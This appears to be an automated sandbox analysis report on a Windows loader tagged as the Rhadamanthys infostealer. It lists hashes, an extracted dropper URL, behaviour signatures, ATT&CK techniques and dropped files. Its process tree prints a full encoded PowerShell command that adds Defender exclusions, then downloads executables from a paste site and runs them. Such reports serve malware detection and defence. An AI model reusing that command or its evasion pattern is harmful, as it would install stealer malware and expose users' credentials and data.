Analysis

  • max time kernel
    56s
  • max time network
    58s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-06-2024 15:37

General

  • Target

    Loader/Loader.exe

  • Size

    7KB

  • MD5

    b5e479d3926b22b59926050c29c4e761

  • SHA1

    a456cc6993d12abe6c44f2d453d7ae5da2029e24

  • SHA256

    fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

  • SHA512

    09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

  • SSDEEP

    192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:1268
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:456
    • C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Users\Admin\AppData\Roaming\iquax5fu.tws0.exe
          "C:\Users\Admin\AppData\Roaming\iquax5fu.tws0.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:888
        • C:\Users\Admin\AppData\Roaming\iquax5fu.tws1.exe
          "C:\Users\Admin\AppData\Roaming\iquax5fu.tws1.exe"
          3⤵
          • Executes dropped EXE
          PID:740
        • C:\Users\Admin\AppData\Roaming\iquax5fu.tws2.exe
          "C:\Users\Admin\AppData\Roaming\iquax5fu.tws2.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3056
        • C:\Users\Admin\AppData\Roaming\iquax5fu.tws3.exe
          "C:\Users\Admin\AppData\Roaming\iquax5fu.tws3.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1424
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\245C.tmp\245D.tmp\245E.bat C:\Users\Admin\AppData\Roaming\iquax5fu.tws3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\system32\where.exe
              where node
              5⤵
                PID:3140
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:104

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Discovery

      System Information Discovery

      1
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        4d08957cd1068478e48749e43dfd4aab

        SHA1

        2cefe5049fe70ed5ddc7a3411e1eba6ba1824128

        SHA256

        91cc00ad7da797d66d44be0c8e57807b48a445a9b2cfb03db95e61e1bf911901

        SHA512

        cd1eea4f202b8ea4d772f74a99166bf9232f8c688bc4d22ac193e01290ce001f84d91132eb234115be2abfb0c32ef3b3216a474204ba96ac7c44d97cd6775d5e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        578b70bdbae3d0419338c607e89dd4a7

        SHA1

        3596251615322548ef89d384b1efd7f6fb6a4150

        SHA256

        64e813d53557521b1c30bef1e2593f035edc7f3a06d5d417b8098225df527005

        SHA512

        5f913d25960fc6a27ec4fcd4daf139646da0b9afa39a8677f4f7d8bec9f437e9f682c765f783664ffcf6cba09ada360f9c44c120ba047be5ec885624f3299066

      • C:\Users\Admin\AppData\Local\Programs\Steam\chrome_100_percent.pak
        Filesize

        146KB

        MD5

        6c2827fe702f454c8452a72ea0faf53c

        SHA1

        881f297efcbabfa52dd4cfe5bd2433a5568cc564

        SHA256

        2fb9826a1b43c84c08f26c4b4556c6520f8f5eef8ab1c83011031eb2d83d6663

        SHA512

        5619ad3fca8ea51b24ea759f42685c8dc7769dd3b8774d8be1917e0a25fa17e8a544f6882617b4faa63c6c4f29844b515d07db965c8ea50d5d491cdda7281fc5

      • C:\Users\Admin\AppData\Local\Temp\245C.tmp\245D.tmp\245E.bat
        Filesize

        1KB

        MD5

        2b49f09f8e1785bf2e5c79d0f2bc7389

        SHA1

        05d68482ab1db17e11fef25fae270c3b784000ae

        SHA256

        706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

        SHA512

        ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oll4g2a5.f1b.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\7z-out\chrome_200_percent.pak
        Filesize

        220KB

        MD5

        77088f98a0f7ea522795baec5c930d03

        SHA1

        9b272f152e19c478fcbd7eacf7356c3d601350ed

        SHA256

        83d9243037b2f7e62d0fdfce19ca72e488c18e9691961e2d191e84fb3f2f7a5d

        SHA512

        5b19115422d3133e81f17eedbacee4c8e140970120419d6bbfe0e99cf5528d513eea6583548fa8a6259b260d73fab77758ad95137b61fe9056101dd5772e8f4a

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\7z-out\d3dcompiler_47.dll
        Filesize

        2.2MB

        MD5

        7a81714f83f08340a915ca87a171f8d1

        SHA1

        ee2a696f7204db4861359ab11940d78733cffd4e

        SHA256

        6087ac79ad22659ed17fc10d3301a017e65f616e8f2ead9021cfb3cd1d5d54b5

        SHA512

        d5c1c6fcea85fc01dcaba3307fbf5d60837fb5ef28808ef46a1eedca0986cde9944d9e6697a0cffae7c0361bed48c6e033adbf54d454efd3a02e8a430d82e0ab

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\7z-out\ffmpeg.dll
        Filesize

        2.2MB

        MD5

        1d9da2de6f55ae835931f89664fb3180

        SHA1

        0fb681fc9e6130275c958386c94a675e6d9003c9

        SHA256

        d71eb7edc67a830812e1f3333f5225a3375cb645ef692e76d27eddd8e25859a6

        SHA512

        76ea963a656051b415f05ffc45dc56dacc781d13a3417b8c8e69c1d5609799a39d91dd2123270262790fd1782ced0e742b76b240e6b9ef4b57fcd573e2e1ba79

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\StdUtils.dll
        Filesize

        100KB

        MD5

        c6a6e03f77c313b267498515488c5740

        SHA1

        3d49fc2784b9450962ed6b82b46e9c3c957d7c15

        SHA256

        b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

        SHA512

        9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\System.dll
        Filesize

        12KB

        MD5

        0d7ad4f45dc6f5aa87f606d0331c6901

        SHA1

        48df0911f0484cbe2a8cdd5362140b63c41ee457

        SHA256

        3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

        SHA512

        c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\nsExec.dll
        Filesize

        6KB

        MD5

        ec0504e6b8a11d5aad43b296beeb84b2

        SHA1

        91b5ce085130c8c7194d66b2439ec9e1c206497c

        SHA256

        5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962

        SHA512

        3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57

      • C:\Users\Admin\AppData\Local\Temp\nsh246C.tmp\nsis7z.dll
        Filesize

        424KB

        MD5

        80e44ce4895304c6a3a831310fbf8cd0

        SHA1

        36bd49ae21c460be5753a904b4501f1abca53508

        SHA256

        b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

        SHA512

        c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

      • C:\Users\Admin\AppData\Roaming\iquax5fu.tws1.exe
        Filesize

        5.2MB

        MD5

        f55fc8c32bee8f7b2253298f0a0012ba

        SHA1

        574c7a8f3eb378c03f58bc96252769296b20970e

        SHA256

        cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

        SHA512

        c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

      • C:\Users\Admin\AppData\Roaming\iquax5fu.tws2.exe
        Filesize

        423KB

        MD5

        448e72d5b4a0ab039607cbaf93707732

        SHA1

        bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f

        SHA256

        df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20

        SHA512

        a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4

      • C:\Users\Admin\AppData\Roaming\iquax5fu.tws3.exe
        Filesize

        89KB

        MD5

        a3b2fcf0c05bb385115894d38c2e6c44

        SHA1

        32cf50911381bbec1dad6aec06c2a741bd5d8213

        SHA256

        dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

        SHA512

        fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

      • memory/456-282-0x0000000002B00000-0x0000000002F00000-memory.dmp
        Filesize

        4.0MB

      • memory/456-280-0x0000000000E90000-0x0000000000E99000-memory.dmp
        Filesize

        36KB

      • memory/456-286-0x0000000075DF0000-0x0000000076042000-memory.dmp
        Filesize

        2.3MB

      • memory/456-283-0x00007FFD298E0000-0x00007FFD29AE9000-memory.dmp
        Filesize

        2.0MB

      • memory/1428-0-0x00007FFD087A3000-0x00007FFD087A5000-memory.dmp
        Filesize

        8KB

      • memory/1428-1-0x0000000000740000-0x0000000000748000-memory.dmp
        Filesize

        32KB

      • memory/2656-16-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-19-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-14-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-11-0x00000181B9100000-0x00000181B9122000-memory.dmp
        Filesize

        136KB

      • memory/2656-12-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-13-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-64-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-17-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-18-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/2656-15-0x00007FFD087A0000-0x00007FFD09262000-memory.dmp
        Filesize

        10.8MB

      • memory/3056-284-0x0000000000640000-0x00000000006BE000-memory.dmp
        Filesize

        504KB

      • memory/3056-279-0x0000000075DF0000-0x0000000076042000-memory.dmp
        Filesize

        2.3MB

      • memory/3056-277-0x00007FFD298E0000-0x00007FFD29AE9000-memory.dmp
        Filesize

        2.0MB

      • memory/3056-276-0x00000000035D0000-0x00000000039D0000-memory.dmp
        Filesize

        4.0MB

      • memory/3056-275-0x00000000035D0000-0x00000000039D0000-memory.dmp
        Filesize

        4.0MB

      • memory/3056-55-0x0000000000640000-0x00000000006BE000-memory.dmp
        Filesize

        504KB